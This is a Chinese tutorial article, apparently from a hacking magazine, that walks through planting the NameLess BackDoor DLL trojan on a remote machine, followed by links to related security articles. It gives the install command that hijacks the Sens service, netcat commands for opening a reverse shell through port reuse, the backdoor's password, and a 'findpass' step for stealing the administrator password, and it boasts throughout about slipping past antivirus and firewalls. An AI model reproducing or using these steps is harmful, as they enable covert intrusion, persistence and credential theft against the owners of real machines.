新兴木马NameLess BackDoor复仇记(图)

NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹。
说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess。这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了。而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能。同时NameLess BackDoor又去除了各处的缺点,比如反弹的cmd.exe进程,在目标机器的进程管理中也可以隐藏无需利用BITS服务等(马儿:不开端口,无进程,看看防火墙和杀毒软件还能拿我怎么办!气死你,哈哈)。

NameLess BackDoor实战演练

将NameLess BackDoor安装上远程主机到连接木马控制主机,就像一场进行在杀毒软件和防火墙眼皮底下,却又无声无悄的暗战。

一、随风潜入夜——安装

下载NameLess BackDoor木马,压缩包中有两个名为NameLess.dll的DLL文件,一个Pack压缩加过壳的,一个是Unpack未压缩加壳的。先在本地用各种杀毒软件扫描一下这两个文件(笔者用的是最新病毒库的KV2005),但是一向以杀毒能力著称的KV2005竟然对这两个木马文件视而不见。呵,这下子可以放心的在任何环境下进行安装了。

怎么将木马安装到远程的电脑上呢?当然最简单的就是扫描要攻击电脑上的系统漏洞,然后进行攻击入侵控制。方法很多了,反正你拿到远程主机的控制权后,将上面的任意一个“NameLess.dll”文件上传到远程主机上的。在这里笔者是使用Ttelnet远程连接后,写入一个FTP下载的BAT文件,直接在本地建立了一个FTP服务器,通过FTP服务器下载上传文件的(这些内容以前杂志介绍过,这里就不作过多的讲解啦)。下面重点来看看我是怎样安装木马文件的吧!

在远程Ttelnet命令窗口中切换到文件上传目录中,并输入如下命令(如图1):

Rundll32 NameLess.dll,Install
执行该命令后后门就被安装成功了,后门会自动替换系统服务Sens的ServiceDll文件,在电脑重启后以Svchost.exe启动。

小提示:由于NameLess BackDoor是一个DLL型木马,因此在安装和启动的过程中,远程主机上的杀毒软件不会有任何提示和反应。

二、穿墙细无声——连接

安装和启动的过程中顺利地搞定了杀毒软件,下面看看NameLess BackDoor怎么让防火墙无能为力的。

小提示:NameLess BackDoor有两种连接方式:正向连接和反向连接,其中反向方式连接可以让防火墙不会发出任何提示。同时NameLess BackDoor在连接后门时使用了端口复用技术,通过重用系统进程开放的任意一个端口,因此可以轻松的穿透各种防火墙。

我们首先需要扫描远程主机上开放了哪些端口,假设某台远程主机(IP地址为:192.168.1.11)上开放了139端口,那么可以本地打开一个命令窗口,切换到瑞士军刀NC所在的目录中,运行如下命令:
nc -l -p 12345
命令执行后将在本地监听12345端口,然后再打开一个命令窗口,输入如下命令(如图2):

nc 192.168.1.11 139
建立连接后输入如下内容(如图3):

dargun|192.168.1.11:12345
其中的IP地址可根据具体情况进行更改。命令执行后,在刚才的监听窗口中就可以看到出现了连接提示:“Enter Password:”,输入密码158352692后就可以成功的登陆远程主机而不被防火墙发现了!(如果我是防火墙,一定气疯了,哈)

三、为我所欲为——控制

成功“气死”杀毒软件和“逼疯”防火墙后,现在就可以控制远程主机了。NameLess BackDoor的强大也体现在它的控制功能上,连接登陆远程主机后,输入help命令,即可看到详细的命令帮助信息(如图4)。如果你使用过winshell或wineggdropshell的话,应该对这种模式的后门就不会陌生,不过就算从来没有使用过这样的后门,也会感觉很简单的。

javascript:resizepic(this) border=0>

1.巧盗管理员密码
连接上远程主机后该干什么呢?我得好好想一想……呵呵,看看管理员的密码是多少吧!
在命令窗口中直接输入“findpass”命令,很快就可以看到管理员的密码了(如图5),真是够简单的!

javascript:resizepic(this) border=0>

(0)

相关推荐

  • 新兴木马NameLess BackDoor复仇记(图)

    NameLess BackDoor是一款新兴的DLL型木马,这个木马出世没多久,但绝对是一匹极有潜质的千里驹.说起NameLess BackDoor的前身来,不得不提及榕哥的BITS和WinEggDrop的PortLess.这两款大名鼎鼎的木马曾经都风光一时,可以说是木马界的元老了.而NameLess BackDoor则是汇集了上面这两款木马的优点,在目标机器的进程管理器中看不到,平时没有端口,提供正向连接和反向连接两种功能.同时NameLess BackDoor又去除了各处的缺点,比如反弹的c

  • 使用BAT命令关闭:135端口、139端口、445端口等

    都知道135端口,139端口以及445端口.这三个端口容易被黑客或者病毒利用.所以我们今天就来教下大家如何关闭它. 太难的方法就不教给大家了.什么实用策略组之类的.新手感觉很麻烦.所以下面给大家来简单的教程 打开可以将下面的代码复制到文本里面然后保存为123.bat,然后运行就可以了 @echo off gpupdate >nul rem For Client only iPseccmd -w REG -p "HFUT_SECU" -o -x >nul ipseccmd -

  • 用批处理设置IP安全策略的代码

    以下内容只有回复后才可以浏览 ipseccmd -w REG -p "XIAOWANG" -r "Block ICMP" -f *+0:ICMP -n BLOCK -x 开网上邻居.bat 复制代码 代码如下: ipseccmd -w REG -p "XIAOWANG" -r "Block TCP/80" -f *+0:80:TCP -n PASS -x ipseccmd -w REG -p "XIAOWANG&qu

  • 批处理一键关闭高危有害端口完整版(适合服务器使用)

    注意:你的系统不一定支持ipseccmd,可以在cmd里试一下或者在下面代码的某句ipseccmd后另起一行加个pause看看报不报错! 如果不支持,证明你安装的系统并没有装上windows support  tools.请到微软下载安装或到我们下载 http://www.jb51.net/softs/32393.html. 自己到微软去找吧!今天打开微软的网站特慢.(说不定就是用xp2那个,我用的xp3原版,里面有,只是默认没安装). 复制代码 代码如下: echo.echo ********

  • 研究桃源留言本的漏洞

    桃源留言本是桃源工作室http://www.mytaoyuan.com/开发的一个asp留言系统.由于桃源留言本界面清新,功能强大,简洁适用,所以被一些大大小小的网站所采用,受到许多站长的好评.桃源留言本由原来的2.0版,升级到现在的3.0版.其官方网站也是3.0版.前段时间,我在入侵我们学校的网站的时候,发现了一个部门的网站上有这个留言本.于是引起了我对它的一番研究,我下载了各个版本的源代码,读了部分代码之后,发现漏洞还真不少.  一.上传漏洞 我在网上搜索的时候,发现已经有人公布了一个上传漏

  • 雷客图ASP站长安全助手的ASP木马查找功能

    可以在线查找空间里的asp木马 复制代码 代码如下: <%@LANGUAGE="VBSCRIPT" CODEPAGE="936"%> <% '设置密码 PASSWORD = "jb51net" dim Report if request.QueryString("act")="login" then     if request.Form("pwd") = PASSWO

  • 雷客图 站长安全助手 vbs版代码(asp 木马查找)

    均在命令行下使用 AntiIframe.vbs #该脚本是批量挂马程序的逆向,用于批量清除被添加到文件中的恶意代码.记事本打开文件可以修改Pattern参数指定要处理的文件名,文件名之间用|隔开(也支持vbs正则表达式).由于要修改文件,请谨慎的使用(最好先备份文件) #用法: CScript AntiIframe.vbs [处理的路径] [包含清除内容的文件] #例子: CScript AntiIframe.vbs d:\Web d:\lake2.txt -------------------

  • 记一次入侵Linux服务器和删除木马程序的经历

    一.背景 晚上看到有台服务器流量跑的很高,明显和平常不一样,流量达到了800Mbps,第一感觉应该是中木马了,被人当做肉鸡了,在大量发包. 我们的服务器为了最好性能,防火墙(iptables)什么的都没有开启,但是服务器前面有物理防火墙,而且机器都是做的端口映射,也不是常见的端口,按理来说应该是满安全的,可能最近和木马有缘吧,老是让我遇到,也趁这次机会把发现过程记录一下. 二.发现并追踪处理 1.查看流量图发现问题 查看的时候网页非常卡,有的时候甚至没有响应. 2.top动态查看进程 我马上远程

  • 网友举报:屁屁宽频软件自带木马病毒(图)

    昨天下载屁屁宽频.测试验证该程序有木马病毒. 系统启动项加载mstasks.exe 下面引自瑞星升级报告之: 27.Trojan.SdBot.gen.p 破坏方法:拷贝自己到系统目录,命名为MSTASKS.EXE,登记为自启动. 病毒驻留内存,非法连接hirc.3322.org,将本地信息泄漏出去. http://virus.chinavnet.com/newSite/Channels/Anti_Virus/Upgrade_Report/Upgrade_Report/200308/18-1708

  • 雷客图ASP站长安全助手vbs测试版代码

    雷客图ASP站长安全助手是一个基于ASP的帮助站长维护网站安全的程序.这个版本(vbs测试版)主要用于服务器本地运行以查找ASP木马.此版本为测试版,希望大家提供反馈意见,谢谢.另,正式版将整合到雷客图ASP站长安全助手的下个版本. 使用说明: 在命令提示符下: #用法: CScript scan.vbs [扫描路径] [结果HTM文件路径] #例子: CScript scan.vbs d:\Web f:\my\report.html 复制代码 代码如下: '------------------

随机推荐